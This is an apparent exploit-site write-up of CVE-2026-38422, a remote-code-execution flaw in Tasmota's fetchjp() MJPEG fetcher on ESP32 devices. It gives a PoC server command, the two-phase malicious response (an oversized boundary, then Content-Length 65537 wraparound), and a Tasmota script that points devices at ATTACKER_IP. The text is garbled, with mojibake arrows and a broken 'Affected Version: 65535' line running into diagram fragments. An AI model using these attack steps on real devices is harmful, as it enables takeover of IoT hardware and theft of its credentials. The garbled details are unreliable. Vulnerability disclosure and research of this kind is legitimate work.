Share
## https://sploitus.com/exploit?id=2428BCC8-F3C8-547C-A188-3E4136F74539
# CVE-2026-38422: Remote Code Execution via Combined Buffer Overflows in Tasmota fetch_jpg()
**CVE:** CVE-2026-38422
**Severity:** Critical (CVSS 9.8)
**Product:** Arendst Tasmota
**Affected Version:** 65535
โ Content-Length: 65537
โ โ uint16_t size = 1 (wraparound)
โ โ malloc(1), readBytes(buff, 1)
โ โ 65536 bytes remain in stream โ heap/stream corruption
โผ
Double Corruption โ RCE / Guaranteed DoS
```
---
## Proof of Concept
```python
# Combined attack โ phase 1 + phase 2
python3 CVE-2026-38422_poc.py --port 8887 --mode dos
```
The PoC server:
1. Accepts connection from Tasmota (`fetchjp()` trigger)
2. **Phase 1:** Sends initial HTTP 200 with boundary string of 80 chars (overflow)
3. **Phase 2:** Sends MJPEG frames with `Content-Length: 65537` (wraparound)
See [CVE-2026-38422_poc.py](CVE-2026-38422_poc.py) for full implementation.
---
## Trigger via Tasmota Script
```
>D
>B
fetchjp(ATTACKER_IP:8887/stream,0,0,1)
>1
=fetchjp(2,0,0,1)
```
The device must be running a Tasmota script using `fetchjp()`. The attacker controls the server the device connects to (or performs MITM on an existing connection).
---
## Impact
- **Confidentiality:** High โ RCE on ESP32, access to device secrets/credentials
- **Integrity:** High โ full device takeover
- **Availability:** High โ guaranteed crash/reboot loop
- **Attack Vector:** Network (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- **CVSS Score:** 9.8 Critical
---
## Affected Devices
Any ESP32-based Tasmota device running version <= 15.3.0.3 with scripter support enabled and a script using `fetchjp()` to connect to an external MJPEG server.
---
## Timeline
- **2026-03-29:** Both vulnerabilities discovered and reported to MITRE
- **2026-03-29:** CVE-2026-38422 assigned
- **2026-05-xx:** Patch released by Tasmota (v15.3.0.4+)
---
## References
- [Tasmota GitHub](https://github.com/arendst/Tasmota)
- [xdrv_10_scripter.ino](https://github.com/arendst/Tasmota/blob/development/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino)
- CVE-2026-38422
- Related: CVE-2026-38426 (strcpy overflow)
- Related: CVE-2026-38427 (uint16_t wraparound)